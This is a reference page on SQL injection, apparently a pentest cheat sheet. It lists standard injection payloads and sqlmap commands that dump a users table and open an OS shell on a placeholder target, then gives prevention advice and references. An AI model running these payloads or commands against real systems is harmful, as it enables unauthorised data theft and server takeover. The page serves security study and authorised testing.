Sql Injection

Overview

SQL injection is a code injection technique that exploits security vulnerabilities in an application's database layer. An attacker can inject malicious SQL queries that are executed by the backend database, potentially bypassing authentication, exfiltrating data, or executing administrative operations.

This attack occurs when user input is incorrectly filtered for string literal escape characters embedded in SQL statements, allowing an attacker to modify the intended query structure.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Sql Injection:

' OR '1'='1

' OR 1=1--

" OR 1=1--

' UNION SELECT NULL--

' AND SLEEP(5)--

' WAITFOR DELAY '0:0:5'--

' AND 1=1-- (true page)

' AND 1=2-- (false page)

sqlmap -u 'http://target.com/page?id=1' --batch

sqlmap -u 'http://target.com/page?id=1' --dbs

sqlmap -u 'http://target.com/page?id=1' -D dbname --tables

sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump

sqlmap -r request.txt -p parameter --os-shell

Tools & Techniques

Recommended tools for Sql Injection:

• SQLMap: automated SQL injection detection and exploitation
• Burp Suite: intercept and modify requests
• jSQL Injection: GUI-based SQL injection tool
• NoSQLMap: automated NoSQL injection tool
• Manual payload crafting for WAF bypasses

Prevention & Mitigation

Security recommendations to prevent Sql Injection:

• Use parameterized queries / prepared statements
• Employ strict input validation and allowlists
• Apply the principle of least privilege for database users
• Use a Web Application Firewall (WAF) as defense-in-depth
• Regularly update and patch database systems
• Conduct code reviews with automated SAST tools

References

Additional resources:

• https://portswigger.net/web-security/sql-injection
• https://github.com/sqlmapproject/sqlmap
• https://owasp.org/www-community/attacks/SQL_Injection